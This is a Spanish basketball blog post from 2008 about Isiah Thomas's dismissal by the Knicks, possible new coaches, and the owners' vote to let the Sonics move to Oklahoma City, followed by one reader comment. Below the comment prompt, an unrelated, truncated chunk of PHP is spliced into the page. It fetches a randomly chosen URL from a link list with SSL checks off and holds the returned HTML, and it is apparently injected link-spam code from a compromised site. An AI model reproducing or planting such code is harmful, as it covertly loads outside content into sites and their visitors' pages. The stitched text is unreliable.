Bye, bye, Thomas

19 de April de 2008 por Gallis

Como decíamos hace un par de días, la salida de Isiah Thomas del banquillo de los Knicks era cuestión de horas. Y así ha sido. Donnie Walsh, el nuevo presidente de Kincks ha anunciado, por fin, el despido del ex base de los Pistons. Una decisión tomada desde hace más de una semana, pero que hemos conocido en las últimas horas. Este despido es la consecuencia lógica del pésimo trabajo realizado por Thomas desde que llegó a NY en diciembre de 2003. Sin embargo, es posible que Thomas no abandone los Knicks, ya que nada más llegar Walsh, Isiah afirmó que estaba a dispuesto a trabajar en cualquier cargo que Walsh considerara oportuno, una posibilidad que su nuevo jefe dejó ayer abierta.

Pero despedir a Thomas es solo el primer paso de un largo proceso de reconstrucción. Y es que, como ya contamos en este blog, la situación de los Knicks es harto complicada. Siguiendo el orden lógico, el siguiente paso de Walsh será contratar un nuevo entrenador. Y no será fácil, porque no muchos parecen dispuestos a hipotecar su crédito dirigiendo a un equipo sin futuro a corto y medio plazo. Como ya comentamos, Mark Jackson es el principal candidato al banquillo de la gran manzana, aunque no es la única opción. Rick Carlise y Scott Skiles aparecen en todas las quinielas, pero sus destinos más probables parecen Chicago y Milwaukee, respectivamente. Y en las últimas horas ha salido incluso el nombre de Jeff Van Gundy, una opción difícil de creer si recordamos que las relaciones entre el mayor de los Van Gundy y el propietario de los Knicks, James Dolan, acabaron muy deterioradas. Sin duda el verano en New York va a ser de lo más movido.

En otro orden de cosas, la marcha de los Sonics a Oklahoma City (hogar de su propietario, Clay Bennett) está un poco más cerca. Los propietarios de las 30 franquicias NBA decidieron ayer, por 28 votos a favor y tan solo 2 en contra, aprobar el traslado de la mitica escuadra. Tan solo Paul Allen, propietario de los Blazers y el mediático Mark Cuban votaron en contra de este cambio de ubicación. Sin embargo, todavía queda un largo camino por recorrer. Las autoridades de la ciudad y del estado de Washington han demandado a Bennett, un proceso que podría retrasar el traslado hasta 2010. Además, el ex propietario Howard Schultz ha anunciado también su intención de denunciar a Bennett, a quién vendió el equipo en 2006. Según Schultz, Bennett no hizo todo lo posible por conseguir que se construyera un nuevo Arena. Ésa era la principal condición que Schultz puso para acceder a la venta y es el principal motivo esgrimido por Bennett para justificar su petición. En cualquier caso, David Stern no parece dispuesto a que este proceso se alargue en el tiempo, con lo que es de esperar que el equipo empiece la próxima temporada en la ciudad que le acoja definitivamente.

Comenta

Un comentario a esta entrada

  1. Gallis dice:
    #1

    Solo decir que la primera condición que Walsh le ha puesto a Thomas para continuar en Knicks es no hablar con los jugadores, jojojojo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>